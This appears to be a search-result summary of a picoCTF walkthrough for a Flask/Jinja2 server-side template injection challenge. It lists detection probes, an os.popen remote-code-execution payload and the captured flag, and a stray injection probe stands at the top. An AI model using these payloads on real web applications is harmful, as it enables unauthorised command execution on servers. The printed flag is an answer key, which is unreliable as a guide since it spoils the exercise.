Back to Search New Search

{%if 1==1%}SSTIOK26488{%endif%}

SSTI Exploit Walkthrough

  • The challenge runs a Flask/Jinja2‑based web page that echoes user‑provided content directly into the template.
    hwkim301.com

  • By sending {{7*7}} the server returns 49, proving that the engine evaluates Jinja2 syntax.
    hwkim301.com

  • Trying {{7*'7'}} yields 7777777, which distinguishes Jinja2 from Twig.
    hwkim301.com

  • An RCE payload can leverage the built‑in __builtins__ and os.popen to execute arbitrary commands.
    portswigger.net

    • Payload: {{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}
    • The server prints the flag picoCTF{s4rv3r_s1d3_t3mp14t3_1nj3ct10n5_4r0c3b6390}. * Source: hwkim301.com

  • Examining the source code shows a one‑liner route that concatenates the POSTed input straight into the rendered template.
    hwkim301.com

Key Images

source

source

source

source

The walkthrough demonstrates how SSTI can be detected, the responsible template engine identified, and finally abused to retrieve the flag.

Sources

hwkim301.com hwkim301.com portswigger.net portswigger.net book.hacktricks.wiki book.hacktricks.wiki red.infiltr8.io red.infiltr8.io